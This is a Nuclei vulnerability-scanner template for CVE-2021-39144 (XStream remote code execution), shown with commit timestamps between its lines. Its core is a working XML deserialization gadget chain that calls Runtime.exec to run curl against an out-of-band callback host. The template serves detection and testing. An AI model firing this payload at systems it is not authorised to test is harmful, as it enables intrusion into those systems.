nuclei-templates/http/cves/2021/CVE-2021-39144.yaml

86 lines
3.1 KiB
YAML
Raw Normal View History

2023-03-12 03:38:05 +00:00
id: CVE-2021-39144
info:
name: XStream 1.4.18 - Remote Code Execution
2023-05-06 16:36:32 +00:00
author: pwnhxl,vicrack
2023-03-12 03:38:05 +00:00
severity: high
2023-03-23 11:21:46 +00:00
description: |
XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.
2023-03-12 03:38:05 +00:00
reference:
- https://x-stream.github.io/CVE-2021-39144.html
- https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh
- https://security.netapp.com/advisory/ntap-20210923-0003/
- https://nvd.nist.gov/vuln/detail/cve-2021-39144
2023-07-11 19:49:27 +00:00
- https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 8.5
cve-id: CVE-2021-39144
2023-07-11 19:49:27 +00:00
cwe-id: CWE-306,CWE-502
epss-score: 0.97244
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.99759
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: xstream_project
product: xstream
tags: cve,cve2021,xstream,deserialization,rce,kev
2023-03-12 03:38:05 +00:00
http:
2023-03-12 03:38:05 +00:00
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class='sun.tracing.NullProvider'>
<active>true</active>
<providerType>java.lang.Comparable</providerType>
<probes>
<entry>
<method>
<class>java.lang.Comparable</class>
<name>compareTo</name>
<parameter-types>
<class>java.lang.Object</class>
</parameter-types>
</method>
<sun.tracing.dtrace.DTraceProbe>
<proxy class='java.lang.Runtime'/>
<implementing__method>
<class>java.lang.Runtime</class>
<name>exec</name>
<parameter-types>
<class>java.lang.String</class>
</parameter-types>
</implementing__method>
</sun.tracing.dtrace.DTraceProbe>
</entry>
</probes>
</handler>
</dynamic-proxy>
2023-05-06 16:36:32 +00:00
<string>curl http://{{interactsh-url}}</string>
2023-03-12 03:38:05 +00:00
</java.util.PriorityQueue>
</java.util.PriorityQueue>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
2023-03-22 10:03:02 +00:00
- "http"
- type: word
part: interactsh_request
words:
2023-05-06 16:36:32 +00:00
- "User-Agent: curl"